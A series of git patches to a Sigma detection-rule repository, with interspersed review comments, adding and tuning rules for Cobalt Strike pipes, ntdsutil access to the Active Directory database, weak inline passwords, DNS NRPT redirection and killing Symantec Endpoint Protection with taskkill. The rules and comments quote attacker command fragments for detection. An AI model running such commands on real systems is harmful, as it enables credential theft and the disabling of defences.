Subject: [PATCH 21/96] Update meta info --- rules/web/web_cve_2022_31659_vmware_rce.yml | 2 +- .../pipe_created_susp_cobaltstrike_pipe_patterns.yml | 2 +- .../registry_set/registry_set_disable_winevt_logging.yml | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/rules/web/web_cve_2022_31659_vmware_rce.yml b/rules/web/web_cve_2022_31659_vmware_rce.yml index f4c8b747d..8060bcb42 100644 --- a/rules/web/web_cve_2022_31659_vmware_rce.yml +++ b/rules/web/web_cve_2022_31659_vmware_rce.yml 
@@ -11,7 +11,7 @@ logsource: detection: selection: cs-method: 'POST' - c-uri|contains: '/SAAS/jersey/manager/api/migrate/tenant' # Investigate the host header to spot the difference between benign and malicious requests to this URL + c-uri|contains: '/SAAS/jersey/manager/api/migrate/tenant' # Investigate the contents of the post body and look for any suspicious hosts that might be controlled by the attacker condition: selection falsepositives: - Vulnerability scanners diff --git a/rules/windows/pipe_created/pipe_created_susp_cobaltstrike_pipe_patterns.yml b/rules/windows/pipe_created/pipe_created_susp_cobaltstrike_pipe_patterns.yml index 5a47a8919..3677db9fd 100644 --- a/rules/windows/pipe_created/pipe_created_susp_cobaltstrike_pipe_patterns.yml +++ b/rules/windows/pipe_created/pipe_created_susp_cobaltstrike_pipe_patterns.yml @@ -56,5 +56,5 @@ detection: - '\MsFteWds' condition: 1 of selection_malleable_profile* and not filter falsepositives: - - Chrome instances using the exactly same name pipe named mojo.something + - Chrome instances using the exact same pipe name "mojo.something" level: high diff --git a/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml b/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml index 04c010857..452485411 100644 --- a/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml +++ b/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml @@ -27,7 +27,7 @@ detection: TargetObject|contains: - '\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-FileInfoMinifilter' - '\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ASN1\' - filter_empty: + filter_empty: # This filter is related to aurora. Should be removed when fix is deployed. # TODO: Remove later Image: - '' - null From 653ad66f21010ab20a7c24f7fdb2931460dfe1e3 Mon Sep 17 00:00:00 2001 
From: "nasreddine.bencherchali@nextron-systems.com" <8741929+nasbench@users.noreply.github.com> Date: Wed, 14 Sep 2022 12:29:57 +0200 Subject: [PATCH 22/96] Updates --- .../win_susp_logon_newcredentials.yml | 0 .../proc_creation_win_dnscmd_discovery.yml | 20 +++++----- ...l => proc_creation_win_ntdsutil_usage.yml} | 18 ++++----- .../proc_creation_win_susp_ditsnap.yml | 23 ++++++----- .../proc_creation_win_susp_ntdsutil_usage.yml | 38 +++++++++++++++++++ ..._creation_win_weak_or_abused_passwords.yml | 26 +++++++++++++ 6 files changed, 95 insertions(+), 30 deletions(-) rename rules/windows/builtin/{ => security}/win_susp_logon_newcredentials.yml (100%) rename rules/windows/process_creation/{proc_creation_win_susp_ntdsutil.yml => proc_creation_win_ntdsutil_usage.yml} (57%) create mode 100644 rules/windows/process_creation/proc_creation_win_susp_ntdsutil_usage.yml create mode 100644 rules/windows/process_creation/proc_creation_win_weak_or_abused_passwords.yml diff --git a/rules/windows/builtin/win_susp_logon_newcredentials.yml b/rules/windows/builtin/security/win_susp_logon_newcredentials.yml similarity index 100% rename from rules/windows/builtin/win_susp_logon_newcredentials.yml rename to rules/windows/builtin/security/win_susp_logon_newcredentials.yml diff --git a/rules/windows/process_creation/proc_creation_win_dnscmd_discovery.yml b/rules/windows/process_creation/proc_creation_win_dnscmd_discovery.yml index 2cdf79b9f..805d9eeae 100644 --- a/rules/windows/process_creation/proc_creation_win_dnscmd_discovery.yml +++ b/rules/windows/process_creation/proc_creation_win_dnscmd_discovery.yml 
@@ -1,23 +1,24 @@ title: Discovery/Execution via dnscmd.exe id: b6457d63-d2a2-4e29-859d-4e7affc153d1 -description: | +description: | Detects an attempt to add a potentially crafted DLL as a plug in of the DNS Service. Detects an attempt to leverage dnscmd.exe to enumerate the DNS zones of a domain. DNS zones used to host the DNS records for a particular domain references: - - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/dnscmd - - https://docs.microsoft.com/en-us/azure/dns/dns-zones-records - - https://lolbas-project.github.io/lolbas/Binaries/Dnscmd/ + - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/dnscmd + - https://docs.microsoft.com/en-us/azure/dns/dns-zones-records + - https://lolbas-project.github.io/lolbas/Binaries/Dnscmd/ status: experimental author: '@gott_cyber' date: 2022/07/31 +modified: 2022/09/14 tags: - - attack.discovery - - attack.execution - - attack.t1543.003 + - attack.discovery + - attack.execution + - attack.t1543.003 logsource: - category: process_creation - product: windows + category: process_creation + product: windows detection: dnscmd: Image|endswith: '\dnscmd.exe' @@ -25,6 +26,7 @@ detection: CommandLine|contains: - '/enumrecords' - '/enumzones' + - '/ZonePrint' - '/info' selection_2: CommandLine|contains|all: diff --git a/rules/windows/process_creation/proc_creation_win_susp_ntdsutil.yml b/rules/windows/process_creation/proc_creation_win_ntdsutil_usage.yml similarity index 57% rename from rules/windows/process_creation/proc_creation_win_susp_ntdsutil.yml rename to rules/windows/process_creation/proc_creation_win_ntdsutil_usage.yml index ff90db27b..312a8ba58 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_ntdsutil.yml +++ b/rules/windows/process_creation/proc_creation_win_ntdsutil_usage.yml 
@@ -4,19 +4,19 @@ status: test description: Detects execution of ntdsutil.exe, which can be used for various attacks against the NTDS database (NTDS.DIT) author: Thomas Patzke references: - - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/ntdsutil.htm + - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/ntdsutil.htm date: 2019/01/16 modified: 2022/03/11 # increased level logsource: - category: process_creation - product: windows + category: process_creation + product: windows detection: - selection: - Image|endswith: '\ntdsutil.exe' - condition: selection + selection: + Image|endswith: '\ntdsutil.exe' + condition: selection falsepositives: - - NTDS maintenance + - NTDS maintenance level: medium tags: - - attack.credential_access - - attack.t1003.003 + - attack.credential_access + - attack.t1003.003 diff --git a/rules/windows/process_creation/proc_creation_win_susp_ditsnap.yml b/rules/windows/process_creation/proc_creation_win_susp_ditsnap.yml index 780851390..e6c83822a 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_ditsnap.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_ditsnap.yml 
@@ -4,22 +4,21 @@ status: test description: Detects the use of Ditsnap tool. Seems to be a tool for ransomware groups. author: 'Furkan Caliskan (@caliskanfurkan_)' references: - - https://thedfirreport.com/2020/06/21/snatch-ransomware/ - - https://github.com/yosqueoy/ditsnap + - https://thedfirreport.com/2020/06/21/snatch-ransomware/ + - https://github.com/yosqueoy/ditsnap date: 2020/07/04 modified: 2021/11/27 logsource: - category: process_creation - product: windows + category: process_creation + product: windows detection: - selection: - Image|endswith: '\ditsnap.exe' - selection2: - CommandLine|contains: 'ditsnap.exe' - condition: selection or selection2 + selection: + - Image|endswith: '\ditsnap.exe' + - CommandLine|contains: 'ditsnap.exe' + condition: selection falsepositives: - - Legitimate admin usage + - Legitimate admin usage level: high tags: - - attack.credential_access - - attack.t1003.003 + - attack.credential_access + - attack.t1003.003 diff --git a/rules/windows/process_creation/proc_creation_win_susp_ntdsutil_usage.yml b/rules/windows/process_creation/proc_creation_win_susp_ntdsutil_usage.yml new file mode 100644 index 000000000..cff53a918 --- /dev/null +++ b/rules/windows/process_creation/proc_creation_win_susp_ntdsutil_usage.yml 
@@ -0,0 +1,38 @@ +title: Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe) +id: a58353df-af43-4753-bad0-cd83ef35eef5 +related: + - id: 2afafd61-6aae-4df4-baed-139fa1f4c345 + type: derived +status: experimental +description: Detects execution of ntdsutil.exe to perform different actions such as restoring snapshots...etc. +author: Nasreddine Bencherchali +references: + - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731620(v=ws.11) + - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments +date: 2022/09/14 +logsource: + category: process_creation + product: windows +detection: + selection_img: + - Image|endswith: '\ntdsutil.exe' + - OriginalFileName: 'ntdsutil.exe' + selection_cli: + - CommandLine|contains|all: + - 'snapshot' + - 'mount ' # mounts a specific snapshot - Ex: ntdsutil snapshot "mount c2b3e2c6-1ffb-4625-ba8e-3503c27a9fcb" quit quit + - CommandLine|contains|all: + # This offers more coverage to the "selection_oneliner_1" case in rule 8bc64091-6875-4881-aaf9-7bd25b5dda08 + # The shorest form of "activate" can "ac". But "act", "acti"...etc are also valid forms + # Same case with the "instance" flag + - 'ac' + - ' i' + - ' ntds' + condition: all of selection_* +falsepositives: + - Legitimate usage to restore snapshots + - Legitimate admin activity +level: medium +tags: + - attack.credential_access + - attack.t1003.003 diff --git a/rules/windows/process_creation/proc_creation_win_weak_or_abused_passwords.yml b/rules/windows/process_creation/proc_creation_win_weak_or_abused_passwords.yml new file mode 100644 index 000000000..0afe7b43e --- /dev/null +++ b/rules/windows/process_creation/proc_creation_win_weak_or_abused_passwords.yml 
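Review bot: The second `CommandLine|contains|all` entry in `selection_cli` relies on the bare tokens `'ac'` and `' i'`, which are satisfied by unrelated substrings (any argument or path containing "ac", any argument starting with "i"); combined with `' ntds'` the entry effectively fires on most ntdsutil invocations that name the ntds instance, so the medium level rests almost entirely on the `selection_img` anchor. The comment explains why the abbreviations are short but not why `ac` has no leading space (presumably because the token may follow a quote, as in `"ac i ntds"`); stating that, and listing the broad-token false-positive risk under `falsepositives`, would help whoever tunes the rule. The comment also misspells "shorest" and the sentence `can "ac"` drops a word; suggested wording: `# The shortest form of "activate" is "ac", but "act", "acti" ... are also accepted; no leading space because the token may follow a quote`.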
@@ -0,0 +1,26 @@ +title: Weak or Abused Passwords In CLI +id: 91edcfb1-2529-4ac2-9ecc-7617f895c7e4 +status: experimental +description: Detects weak passwords or often abused passwords (seen used by threat actors) via the CLI. An example would be a threat actor creating a new user via the net command and providing the password inline +references: + - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments +author: Nasreddine Bencherchali +date: 2022/09/14 +tags: + - attack.defense_evasion + - attack.execution +logsource: + category: process_creation + product: windows +detection: + selection: + CommandLine|contains: + # Add more passwords + - 'Asd123.aaaa' + - 'password123' + - '123456789' + condition: selection +falsepositives: + - Legitimate usage of the passwords by users via commandline (should be discouraged) + - Other currently unknown false positives +level: medium From 02cfd972edf108f8527c50e8b9eabee51250e624 Mon Sep 17 00:00:00 2001 From: krestinichev <100998565+krestinichev@users.noreply.github.com> Date: Wed, 14 Sep 2022 15:37:51 +0300 Subject: [PATCH 23/96] Add files via upload --- .../proc_creation_disable_SEP.yml | 25 +++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 rules/windows/process_creation/proc_creation_disable_SEP.yml diff --git a/rules/windows/process_creation/proc_creation_disable_SEP.yml b/rules/windows/process_creation/proc_creation_disable_SEP.yml new file mode 100644 index 000000000..102423988 --- /dev/null +++ b/rules/windows/process_creation/proc_creation_disable_SEP.yml 
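Review bot: `'123456789'` under `CommandLine|contains` matches that digit run anywhere in a command line, not only in a password position, so any argument embedding it (test data, counters, identifiers, alphabets such as `0123456789abcdef` in scripts) raises a medium-level alert; the two other values are distinctive enough, this one is not. Either scope it to a credential-bearing context in a second selection (for example the `net user ... /add` form the description itself mentions) or drop it and keep the `# Add more passwords` list to values unlikely to appear outside credential arguments. The `tags` list names `attack.defense_evasion` and `attack.execution` without technique ids, and neither tactic obviously fits a weak-password indicator; `attack.credential_access` or T1078 for the "actor creates a user with a known password" scenario seems closer, depending on the intended use.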
@@ -0,0 +1,25 @@ +title: Disabling SEP +id: 4a6713f6-3331-11ed-a261-0242ac120002 +status: experimental +description: detects one of the possible scenarios for disabling symantec endpoint protection. Symantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism. As a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service. +references: + - internal investigation +author: Ilya Krestinichev +date: 2022/09/13 +tags: + - attack.Impair_Defenses + - attack.t1562 +logsource: + category: process_creation + product: windows +detection: + selection: + ParentCommandLine|contains|all: + - 'taskkill' + - 'ccSvcHst.exe' + condition: selection +fields: + - CommandLine +falsepositives: + - Unknown +level: critical \ No newline at end of file From eb4247fdb45bfd2a90e2768e23a9f8473d81242b Mon Sep 17 00:00:00 2001 From: "nasreddine.bencherchali@nextron-systems.com" <8741929+nasbench@users.noreply.github.com> Date: Wed, 14 Sep 2022 15:03:50 +0200 Subject: [PATCH 24/96] Add missing modified field --- .../proc_creation_win_cmd_redirection_susp_folder.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/windows/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml b/rules/windows/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml index dada69bd7..14fc79e5e 100644 --- a/rules/windows/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml +++ b/rules/windows/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml @@ -6,6 +6,7 @@ author: Nasreddine Bencherchali references: - https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/ date: 2022/07/12 +modified: 2022/09/14 logsource: category: process_creation product: windows From d078d47360c00849778d834ce0f491c836632be5 Mon Sep 17 00:00:00 2001 
From: Borna Talebi <49802660+bornatalebi@users.noreply.github.com> Date: Wed, 14 Sep 2022 22:32:35 +0430 Subject: [PATCH 25/96] New Rule: Windows DNS Client Rule --- .../posh_ps_add_dnsclient_rule.yml | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml diff --git a/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml b/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml new file mode 100644 index 000000000..637bf65e2 --- /dev/null +++ b/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml @@ -0,0 +1,23 @@ +title: Windows DNS Client Commands +id: 4368354e-1797-463c-bc39-a309effbe8d7 +status: experimental +description: Detects powershell scripts that adds a Name Resolution Policy Table (NRPT) rule for the specified namespace. This will bypass the default DNS server and uses a specified server for answering the query. +references: + - https://twitter.com/NathanMcNulty/status/1569497348841287681 + - https://docs.microsoft.com/en-us/powershell/module/dnsclient/add-dnsclientnrptrule?view=windowsserver2022-ps +author: Borna Talebi +date: 2021/09/14 +logsource: + product: windows + category: ps_script + definition: Script Block Logging must be enabled +detection: + selection: + ScriptBlockText|contains: Add-DnsClientNrptRule + condition: selection +tags: + - attack.impact + - attack.t1565 +falsepositives: + - Unknown +level: high From 227c2f6bb91f872cc25f33b25f5f14f4d353ce36 Mon Sep 17 00:00:00 2001 From: Borna Talebi <49802660+bornatalebi@users.noreply.github.com> Date: Wed, 14 Sep 2022 23:11:52 +0430 Subject: [PATCH 26/96] Update posh_ps_add_dnsclient_rule.yml --- .../powershell_script/posh_ps_add_dnsclient_rule.yml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) 
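Review bot: `date: 2021/09/14` is a year earlier than the commit (14 Sep 2022) and than the Twitter status cited in `references`, which appears to be from September 2022; this looks like a typo for `date: 2022/09/14` and none of the later patches in this series that touch the file correct it. The unquoted `ScriptBlockText|contains: Add-DnsClientNrptRule` value and the title are reworked by the following patches, so no further comment there. The `attack.impact` / `attack.t1565` mapping is debatable for a DNS-resolution redirect, which reads more like interception than data manipulation; if it is kept, a one-line comment above `tags` explaining the choice would help the next reviewer.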
diff --git a/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml b/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml index 637bf65e2..5d589174b 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml @@ -13,7 +13,10 @@ logsource: definition: Script Block Logging must be enabled detection: selection: - ScriptBlockText|contains: Add-DnsClientNrptRule + ScriptBlockText|contains|all: + - Add-DnsClientNrptRule + - Namespace + - NameServers condition: selection tags: - attack.impact From 0e7085bee5388b7b27319c80f152fc51ac404379 Mon Sep 17 00:00:00 2001 From: Borna Talebi <49802660+bornatalebi@users.noreply.github.com> Date: Wed, 14 Sep 2022 23:23:58 +0430 Subject: [PATCH 27/96] Update posh_ps_add_dnsclient_rule.yml --- .../powershell_script/posh_ps_add_dnsclient_rule.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml b/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml index 5d589174b..def0de1c4 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml @@ -15,8 +15,8 @@ detection: selection: ScriptBlockText|contains|all: - Add-DnsClientNrptRule - - Namespace - - NameServers + - '-Namespace ' + - '-NameServers ' condition: selection tags: - attack.impact From b984d52c65189443a40afcead88097c4e41c1438 Mon Sep 17 00:00:00 2001 From: Borna Talebi <49802660+bornatalebi@users.noreply.github.com> Date: Fri, 16 Sep 2022 00:32:47 +0430 Subject: [PATCH 28/96] Fixing conditions --- .../powershell_script/posh_ps_add_dnsclient_rule.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) 
diff --git a/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml b/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml index def0de1c4..1c8d0ab78 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml @@ -14,9 +14,9 @@ logsource: detection: selection: ScriptBlockText|contains|all: - - Add-DnsClientNrptRule - - '-Namespace ' - - '-NameServers ' + - 'Add-DnsClientNrptRule' + - '-Namesp' + - '-NameSe' condition: selection tags: - attack.impact From 2af0431efafb04f19e8c9fb1bbeb1128b5c9a81d Mon Sep 17 00:00:00 2001 From: Borna Talebi <49802660+bornatalebi@users.noreply.github.com> Date: Fri, 16 Sep 2022 00:53:55 +0430 Subject: [PATCH 29/96] Change Title --- .../powershell/powershell_script/posh_ps_add_dnsclient_rule.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml b/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml index 1c8d0ab78..6acd74a7f 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml @@ -1,4 +1,4 @@ -title: Windows DNS Client Commands +title: Powershell Add Name Resolution Policy Table Rule id: 4368354e-1797-463c-bc39-a309effbe8d7 status: experimental description: Detects powershell scripts that adds a Name Resolution Policy Table (NRPT) rule for the specified namespace. This will bypass the default DNS server and uses a specified server for answering the query. From 92b6ba95e62d2d5514b39be94cdd60e9ef0861fd Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Fri, 16 Sep 2022 09:12:08 +0200 Subject: [PATCH 30/96] reduce the timeframe to 1min --- .../builtin/smbclient/win_susp_failed_hidden_share_mount.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
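Review bot: The `'-Namesp'` / `'-NameSe'` prefixes appear to be the shortest unambiguous abbreviations PowerShell accepts for `-Namespace` and `-NameServers` (the two names diverge only after `-Names`), so the tightening is sound; what `contains|all` still misses is parameter splatting (`@params`) or a hashtable built elsewhere in the script, where the cmdlet name appears in the script block but the parameter names do not. That gap is inherent to the approach and is worth recording in the rule rather than in the commit: `falsepositives` is `Unknown`, and a short comment above the list such as `# Parameters must be named inline; splatted invocations are not covered` would tell the next maintainer why a bare `Add-DnsClientNrptRule` match was rejected. The `date` field of this file (`2021/09/14`) lies outside this hunk and still looks like a typo for 2022.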
diff --git a/rules/windows/builtin/smbclient/win_susp_failed_hidden_share_mount.yml b/rules/windows/builtin/smbclient/win_susp_failed_hidden_share_mount.yml index ab736de4d..fd5cdf40b 100644 --- a/rules/windows/builtin/smbclient/win_susp_failed_hidden_share_mount.yml +++ b/rules/windows/builtin/smbclient/win_susp_failed_hidden_share_mount.yml @@ -16,7 +16,7 @@ detection: selection: EventID: 31010 ShareName|endswith: '$' - timeframe: 10m + timeframe: 1m condition: selection | count() > 10 fields: - ShareName From 6d9d08e1dec7bb6e86cdcfde55fbb23822881616 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Fri, 16 Sep 2022 09:18:27 +0200 Subject: [PATCH 31/96] Update proc_creation_disable_SEP.yml --- .../proc_creation_disable_SEP.yml | 22 ++++++++++--------- 1 file changed, 12 insertions(+), 10 deletions(-) diff --git a/rules/windows/process_creation/proc_creation_disable_SEP.yml b/rules/windows/process_creation/proc_creation_disable_SEP.yml index 102423988..773527fc0 100644 --- a/rules/windows/process_creation/proc_creation_disable_SEP.yml +++ b/rules/windows/process_creation/proc_creation_disable_SEP.yml 
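Review bot: With the window cut to one minute the rule still aggregates with a bare `count() > 10`, so in a SIEM that evaluates the rule over all forwarded hosts the threshold is reached by eleven unrelated failed mounts anywhere in the estate, while a single host probing shares at a slower pace stays below it. Grouping the count by the originating computer (and, where event 31010 carries it, the target server or user) is what makes the "repeated" semantics real, e.g. `condition: selection | count() by Computer > 10`, using whatever field name the smbclient-security source actually exposes. The commit message gives no rationale for 10m to 1m; a comment on the `timeframe` line stating the expected burst pattern would save the next reviewer from guessing.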
@@ -1,25 +1,27 @@ -title: Disabling SEP +title: Disabling Symantec Endpoint Protection with Taskkill id: 4a6713f6-3331-11ed-a261-0242ac120002 status: experimental -description: detects one of the possible scenarios for disabling symantec endpoint protection. Symantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism. As a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service. +description: Detects one of the possible scenarios for disabling symantec endpoint protection. Symantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism. As a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service. references: - - internal investigation -author: Ilya Krestinichev + - https://www.exploit-db.com/exploits/37525 + - https://community.spiceworks.com/topic/2195015-batch-script-to-uninstall-symantec-endpoint-protection + - https://community.broadcom.com/symantecenterprise/communities/community-home/digestviewer/viewthread?MessageKey=6ce94b67-74e1-4333-b16f-000b7fd874f0&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=digestviewer +author: Ilya Krestinichev, Florian Roth date: 2022/09/13 tags: - - attack.Impair_Defenses - - attack.t1562 + - attack.defense_evasion + - attack.t1562.001 logsource: category: process_creation product: windows detection: selection: - ParentCommandLine|contains|all: + CommandLine|contains|all: - 'taskkill' + - ' /F ' + - ' /IM ' - 'ccSvcHst.exe' condition: selection -fields: - - CommandLine falsepositives: - Unknown -level: critical \ No newline at end of file +level: high From b4376ea580c7bdf74ac864b21a97b7e49d6a9162 Mon Sep 17 00:00:00 2001 
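Review bot: `' /F '` requires a trailing space after the flag, so the equally common form with `/F` as the last argument (`taskkill /IM ccSvcHst.exe /F`) does not match even though the description itself quotes `/f` at the end of the command; `' /IM '` is safe because the image name always follows it. Dropping the trailing space, `- ' /F'`, closes that gap; it also admits `/FI` filter invocations, which is acceptable here because `'ccSvcHst.exe'` remains a required token. The description still presents the command fragments out of order ("taskkill /im command several times ccSvcHst.exe /f"); naming the observed form, `taskkill /F /IM ccSvcHst.exe`, would be clearer.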
From: Florian Roth Date: Fri, 16 Sep 2022 09:22:21 +0200 Subject: [PATCH 32/96] refactor: CRLF to LF --- .../proc_creation_disable_SEP.yml | 54 +++++++++---------- 1 file changed, 27 insertions(+), 27 deletions(-) diff --git a/rules/windows/process_creation/proc_creation_disable_SEP.yml b/rules/windows/process_creation/proc_creation_disable_SEP.yml index 773527fc0..abe183491 100644 --- a/rules/windows/process_creation/proc_creation_disable_SEP.yml +++ b/rules/windows/process_creation/proc_creation_disable_SEP.yml 
@@ -1,27 +1,27 @@ -title: Disabling Symantec Endpoint Protection with Taskkill -id: 4a6713f6-3331-11ed-a261-0242ac120002 -status: experimental -description: Detects one of the possible scenarios for disabling symantec endpoint protection. Symantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism. As a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service. -references: - - https://www.exploit-db.com/exploits/37525 - - https://community.spiceworks.com/topic/2195015-batch-script-to-uninstall-symantec-endpoint-protection - - https://community.broadcom.com/symantecenterprise/communities/community-home/digestviewer/viewthread?MessageKey=6ce94b67-74e1-4333-b16f-000b7fd874f0&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=digestviewer -author: Ilya Krestinichev, Florian Roth -date: 2022/09/13 -tags: - - attack.defense_evasion - - attack.t1562.001 -logsource: - category: process_creation - product: windows -detection: - selection: - CommandLine|contains|all: - - 'taskkill' - - ' /F ' - - ' /IM ' - - 'ccSvcHst.exe' - condition: selection -falsepositives: - - Unknown -level: high +title: Disabling Symantec Endpoint Protection with Taskkill +id: 4a6713f6-3331-11ed-a261-0242ac120002 +status: experimental +description: Detects one of the possible scenarios for disabling symantec endpoint protection. Symantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism. As a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service. 
+references: + - https://www.exploit-db.com/exploits/37525 + - https://community.spiceworks.com/topic/2195015-batch-script-to-uninstall-symantec-endpoint-protection + - https://community.broadcom.com/symantecenterprise/communities/community-home/digestviewer/viewthread?MessageKey=6ce94b67-74e1-4333-b16f-000b7fd874f0&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=digestviewer +author: Ilya Krestinichev, Florian Roth +date: 2022/09/13 +tags: + - attack.defense_evasion + - attack.t1562.001 +logsource: + category: process_creation + product: windows +detection: + selection: + CommandLine|contains|all: + - 'taskkill' + - ' /F ' + - ' /IM ' + - 'ccSvcHst.exe' + condition: selection +falsepositives: + - Unknown +level: high From 4fc62dee7c37bf97bb20db6b03e4109e85d1591d Mon Sep 17 00:00:00 2001 
From: "nasreddine.bencherchali@nextron-systems.com" <8741929+nasbench@users.noreply.github.com> Date: Fri, 16 Sep 2022 09:22:57 +0200 Subject: [PATCH 33/96] Linux rules update --- .../auditd/lnx_auditd_data_exfil_wget.yml | 28 +++---- .../lnx_auditd_susp_histfile_operations.yml | 44 +++++----- .../linux/builtin/lnx_shell_susp_commands.yml | 84 +++++++++---------- ..._connection_lnx_back_connect_shell_dev.yml | 23 +++-- .../proc_creation_lnx_at_command.yml | 4 +- .../proc_creation_lnx_base64_decode.yml | 20 ++--- .../proc_creation_lnx_base64_shebang_cli.yml | 27 ++++++ ...ation_lnx_bpftrace_unsafe_option_usage.yml | 22 ++--- .../proc_creation_lnx_cat_sudoers.yml | 27 +++--- .../proc_creation_lnx_clear_logs.yml | 3 +- .../proc_creation_lnx_clear_syslog.yml | 6 +- ...proc_creation_lnx_clipboard_collection.yml | 16 ++-- .../proc_creation_lnx_crontab_removal.yml | 21 +++++ .../proc_creation_lnx_crypto_mining.yml | 54 ++++++------ .../proc_creation_lnx_curl_usage.yml | 22 +++++ .../proc_creation_lnx_doas_execution.yml | 2 +- .../proc_creation_lnx_file_deletion.yml | 4 +- .../proc_creation_lnx_local_account.yml | 8 +- .../proc_creation_lnx_local_groups.yml | 7 +- .../proc_creation_lnx_nohup.yml | 18 ++-- .../proc_creation_lnx_python_pty_spawn.yml | 2 +- ...eation_lnx_security_software_discovery.yml | 9 +- ..._creation_lnx_security_tools_disabling.yml | 48 +++++------ ...creation_lnx_services_stop_and_disable.yml | 26 ++++++ ...proc_creation_lnx_susp_curl_fileupload.yml | 38 +++++++++ .../proc_creation_lnx_susp_curl_useragent.yml | 28 +++++++ .../proc_creation_lnx_susp_history_delete.yml | 35 ++++---- .../proc_creation_lnx_susp_history_recon.yml | 36 ++++---- ...roc_creation_lnx_susp_interactive_bash.yml | 31 ++++--- .../proc_creation_lnx_susp_pipe_shell.yml | 23 +++-- ..._creation_lnx_system_network_discovery.yml | 11 ++- ...lnx_triple_cross_rootkit_execve_hijack.yml | 21 +++-- ...ation_lnx_triple_cross_rootkit_install.yml | 30 +++---- 
